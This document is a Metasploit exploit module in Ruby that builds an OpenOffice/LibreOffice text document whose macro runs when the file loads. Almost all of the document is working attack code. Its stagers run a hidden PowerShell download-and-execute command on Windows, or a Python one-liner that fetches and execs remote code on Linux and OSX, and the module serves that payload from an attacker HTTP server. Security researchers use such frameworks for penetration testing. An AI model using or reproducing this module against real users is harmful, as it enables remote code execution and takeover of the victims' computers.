Apache OpenOffice Text Document Malicious Macro Execution

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'rex/zip'  
require 'cgi'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Powershell  
include Msf::Exploit::Remote::HttpServer  
  
WINDOWSGUI = 'windows'  
OSXGUI = 'osx'  
LINUXGUI = 'linux'  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Apache OpenOffice Text Document Malicious Macro Execution",  
'Description' => %q{  
This module generates an Apache OpenOffice Text Document with a malicious macro in it.  
To exploit successfully, the targeted user must adjust the security level in Macro  
Security to either Medium or Low. If set to Medium, a prompt is presented to the user  
to enable or disable the macro. If set to Low, the macro can automatically run without  
any warning.  
  
The module also works against LibreOffice.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'sinn3r' # Metasploit  
],  
'References' =>  
[  
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
'DisablePayloadHandler' => false  
},  
'Targets' =>  
[  
[  
'Apache OpenOffice on Windows (PSH)', {  
'Platform' => 'win',  
'Arch' => [ARCH_X86, ARCH_X64]  
}],  
[  
'Apache OpenOffice on Linux/OSX (Python)', {  
'Platform' => 'python',  
'Arch' => ARCH_PYTHON  
}]  
],  
'Privileged' => false,  
'DisclosureDate' => "Feb 8 2017"  
))  
  
register_options([  
OptString.new("BODY", [false, 'The message for the document body', '']),  
OptString.new('FILENAME', [true, 'The OpoenOffice Text document name', 'msf.odt'])  
], self.class)  
end  
  
  
def on_request_uri(cli, req)  
print_status("Sending payload")  
  
if target.name =~ /PSH/  
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)  
else  
p = payload.encoded  
end  
  
send_response(cli, p, 'Content-Type' => 'application/octet-stream')  
end  
  
  
def primer  
print_status("Generating our odt file for #{target.name}...")  
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'openoffice_document_macro')  
docm = package_odt(path)  
file_create(docm)  
end  
  
  
def get_windows_stager  
%Q|Shell("cmd.exe /C ""#{generate_psh_stager}""")|  
end  
  
  
def get_unix_stager  
%Q|Shell("#{generate_python_stager}")|  
end  
  
  
def generate_psh_stager  
@windows_psh_stager ||= lambda {  
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl  
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)  
download_and_run = "#{ignore_cert}#{download_string}"  
generate_psh_command_line(  
noprofile: true,  
windowstyle: 'hidden',  
command: download_and_run)  
}.call  
end  
  
  
def generate_python_stager  
@python_stager ||= lambda {  
%Q|python -c ""import urllib2; r = urllib2.urlopen('#{get_uri}'); exec(r.read());""|  
}.call  
end  
  
  
def get_statger  
case target.name  
when /PSH/  
get_windows_stager  
when /Python/  
get_unix_stager  
end  
end  
  
  
# This macro code has the following in mind:  
# 1. It checks the platform to eliminate less misfires. Since we have only tested on Windows/Linux/OSX,  
# we only want to fire at those.  
# 2. Originally, I tried to embed the payload in the macro code, write it out and then execute it.  
# This turned out to be problematic, because for some reason OpenOffice is not able to  
# write a large string to a file (I've tried either shell("echo") or using the macro API).  
# The stager code is similar to web_delivery.  
def macro_code  
CGI.escapeHTML(%Q|  
Sub OnLoad  
Dim os as string  
os = GetOS  
If os = "#{WINDOWSGUI}" OR os = "#{OSXGUI}" OR os = "#{LINUXGUI}" Then  
Exploit  
end If  
End Sub  
  
Sub Exploit  
#{get_statger}  
End Sub  
  
Function GetOS() as string  
select case getGUIType  
case 1:  
GetOS = "#{WINDOWSGUI}"  
case 3:  
GetOS = "#{OSXGUI}"  
case 4:  
GetOS = "#{LINUXGUI}"  
end select  
End Function  
  
Function GetExtName() as string  
select case GetOS  
case "#{WINDOWSGUI}"  
GetFileName = "exe"  
case else  
GetFileName = "bin"  
end select  
End Function  
|)  
end  
  
def on_file_read(short_fname, full_fname)  
buf = File.read(full_fname)  
  
case short_fname  
when /content\.xml/  
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])  
when /Module1\.xml/  
buf.gsub!(/CODEGOESHERE/, macro_code)  
end  
  
yield short_fname, buf  
end  
  
  
def package_odt(path)  
zip = Rex::Zip::Archive.new  
  
Dir["#{path}/**/**"].each do |file|  
p = file.sub(path+'/','')  
  
if File.directory?(file)  
print_status("Packaging directory: #{file}")  
zip.add_file(p)  
else  
on_file_read(p, file) do |fname, buf|  
print_status("Packaging file: #{fname}")  
zip.add_file(fname, buf)  
end  
end  
end  
  
zip.pack  
end  
  
  
def exploit  
super  
end  
  
end  
`